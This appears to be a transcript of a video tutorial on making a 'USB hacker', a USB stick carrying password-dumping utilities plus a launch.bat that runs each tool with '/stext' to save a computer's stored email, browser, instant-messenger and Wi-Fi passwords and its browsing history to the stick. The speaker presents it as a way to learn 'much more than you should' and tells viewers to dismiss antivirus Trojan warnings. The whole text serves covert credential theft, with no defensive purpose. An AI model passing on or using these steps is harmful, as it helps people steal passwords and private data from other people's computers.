Hello everyone, today I'm gonna show you how to make USB hacker easily, but for this you will need some software. First application you will need is Protected Storage Pass View. It shows 4 types of passwords: Outlook passwords, autocomplete passwords in Internet Explorer, password protected sites in Internet Explorer, and MSN Explorer passwords. Mail Pass View shows these mail applications passwords and other account details. Messen Pass shows these Instant Messenger applications passwords. Web Browser Pass View shows Internet Explorer, Mozilla Firefox, Google Chrome, Safari and Opera passwords which are saved on computer. And Wireless Key View shows saved Wi-Fi passwords in computer. Okay, I found one more application from this site, which is Browsing History View. What this application does, it shows Internet Explorer, Mozilla Firefox, Google Chrome and Safari history, which is saved on computer. And with these applications you can know much more than you should. So okay, how to download these applications? Go a little bit down and you will see download, for example, Browsing History View. And I want to warn you that when you open one of these applications, you might get false positive antivirus alert that it is Trojan or horse or maybe rat, but it isn't true. So okay, I have downloaded these zip files and there are 6 folders from 6 applications. Now plug your USB and copy all applications to it. Now you must open Notepad and paste this text: start application.exe /stext application.txt. It converts, for example, mspass.exe application information to mspass.txt file and save it to your USB. Name it launch.bat. It must contain .bat and press save. Okay, let's open it. Wireless Key View will probably ask for administrator access, and if you are on administrator account, press yes. It's a virtual machine, I haven't done anything yet on it much, and it catched almost nothing, as I can see. So thanks for watching, don't forget to subscribe and like this video.
It works, bitches.